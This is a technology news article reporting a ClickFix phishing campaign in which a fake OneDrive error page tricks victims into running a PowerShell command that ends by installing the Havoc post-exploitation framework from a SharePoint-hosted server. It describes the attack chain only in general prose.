Microsoft SharePoint hijacked to spread Havoc malware

News
By
published

Researchers see new ClickFix attack deploying Havoc

A pair of hands using a keyboard
(Image credit: Getty Images)
  • Security researchers spotted a new ClickFix campaign
  • The goal is to deploy the Havoc post-exploitation framework
  • The framework is hosted on a Microsoft SharePoint account

Hackers have been seen abusing Microsoft SharePoint to distribute the Havoc post-exploitation framework in a new ClickFix phishing attack.

Cybersecurity researchers Fortiguard Labs, who have been tracking the campaign since last year, highlighted how ClickFix is a type of scam we’ve probably all encountered at least once. Cybercriminals would hijack a website, and create an overlay that displays a fake error message (for example: “Your browser is outdated, and to view the contents of the webpage, you need to update it”). That fake message would prompt the victim into action, which usually concludes by downloading and running malware, or sharing sensitive information such as passwords or banking data.

This campaign is similar, although requires a bit more activity from the victim’s side. The attack chain starts with a phishing email, carrying a “restricted notice” as a .HTML attachment. Running the attachment displays a fake error that says “Failed to connect to OneDrive - update the DNS cache manually”. The page also has a “How to fix” button that copies a PowerShell command to the Windows clipboard, and then displays a message on how to paste and run it.

Rising threat of ClickFix

Running this script then runs a second one, hosted on the attackers’ SharePoint server which, in turn, downloads a Python script that deploys the Havoc post-exploitation framework as a .DLL file.

Havoc is a post-exploitation framework designed for advanced red teaming and adversary simulation, providing modular capabilities for stealthy command and control (C2) operations. It offers features like in-memory execution, encrypted communication, and evasion techniques to bypass modern security defenses.

ClickFix has gotten insanely popular in these last couple of months. In late October last year, a new malware variant was observed compromising thousands of WordPress websites, installing a malicious plugin that would serve the ClickFix attack.

Just a few weeks prior, researchers saw fake broken Google Meet calls, which was also a variant of the ClickFix attack.

Via BleepingComputer

You might also like

TOPICS
Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.

Read more
A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system
Cloudflare developer domains increasingly abused by threat actors
Hacker Typing
This devious two-step phishing campaign uses Microsoft tools to bypass email security
Hook on Keyboard
Fake DocuSign and HubSpot phishing emails target 20,000 Microsoft Azure accounts
A person at a laptop with a cybersecure lock symbol floating above it.
A worrying security flaw could have left Microsoft SharePoint users open to attack
The best free firewall
Microsoft fixes Power Pages security flaw, tells users to be on their guard
A hacker typing on a MacBook laptop with code on the screen.
This devious phishing site repurposes legitimate web elements like CAPTCHA pages for malware distribution
Latest in Security
US President Donald Trump speaks to the press as he signs an executive order to create a US sovereign wealth fund, in the Oval Office of the White House on February 3, 2025, in Washington, DC.
US set to pause cyber-offensive operations against Russia - but CISA says it won't stop
Web DDoS attacks see major surge as AI allows more powerful attacks
Polish space agency says it was hit by a cyberattack
A pair of hands using a keyboard
Microsoft SharePoint hijacked to spread Havoc malware
Microsoft
Microsoft names cybercriminals who created explicit deepfakes
A laptop with a red screen with a white skull on it with the message: "RANSOMWARE. All your files are encrypted."
More reports claim 2024 was the worst year for ransomware attacks yet
Latest in News
iPad Air M3
Apple updates iPad Air with powerful M3 chip and pairs it with Pro-level Magic Keyboard
Nvidia RTX 5070 Founders Edition GPU shown against a green and black backdrop
Nvidia RTX 5070 early pricing hints at plenty of GPUs at the MSRP – but I’ll believe it when I see it
US President Donald Trump speaks to the press as he signs an executive order to create a US sovereign wealth fund, in the Oval Office of the White House on February 3, 2025, in Washington, DC.
US set to pause cyber-offensive operations against Russia - but CISA says it won't stop
Guitar Hero Mobile
Activision shares first look at Guitar Hero Mobile and, yeah, it looks like AI slop
Web DDoS attacks see major surge as AI allows more powerful attacks
Pulchra Fellini in Zenless Zone Zero.
Zenless Zone Zero Version 1.6 will finally let you play as a furry gunslinger
More about security
US President Donald Trump speaks to the press as he signs an executive order to create a US sovereign wealth fund, in the Oval Office of the White House on February 3, 2025, in Washington, DC.

US set to pause cyber-offensive operations against Russia - but CISA says it won't stop

Web DDoS attacks see major surge as AI allows more powerful attacks
The Samsung Galaxy Tab S10 Ultra on a red background with text saying Big Savings next to it.

Score the Galaxy Tab S10 Ultra for as little as $259.99 in this week's Samsung sale
See more latest
Most Popular
iPad Air M3
Apple updates iPad Air with powerful M3 chip and pairs it with Pro-level Magic Keyboard
Nvidia RTX 5070 Founders Edition GPU shown against a green and black backdrop
Nvidia RTX 5070 early pricing hints at plenty of GPUs at the MSRP – but I’ll believe it when I see it
Building the Lego Beauty and the Beast Castle
Another iconic Disney Castle is getting the Lego treatment, and this one roars
TSMC
TSMC announces huge US investment to boost AI development
Peak Design Roller Pro roller case on the floor of luxury airport, opened out
I’ve been using Peak Design’s innovative new Roller Pro for weeks, and it’s my new go-to carry-on case for travel – here’s why
Guitar Hero Mobile
Activision shares first look at Guitar Hero Mobile and, yeah, it looks like AI slop
A D-pad in the PlayStation Plus logo
Sony is now issuing PS Plus compensation following the recent PSN outage
Princess Tiana holding a frog in her hand and smiling in The Princess and the Frog.
Disney+ reportedly cancels plans to make an offshoot series of The Princess and the Frog, and that’s not the only streaming project it’s abandoning
US President Donald Trump speaks to the press as he signs an executive order to create a US sovereign wealth fund, in the Oval Office of the White House on February 3, 2025, in Washington, DC.
US set to pause cyber-offensive operations against Russia - but CISA says it won't stop
Two hands holding the Tecno Spark Slim phone
The world’s thinnest phone was just revealed, but a new iPhone 17 Air leak suggests it could be even slimmer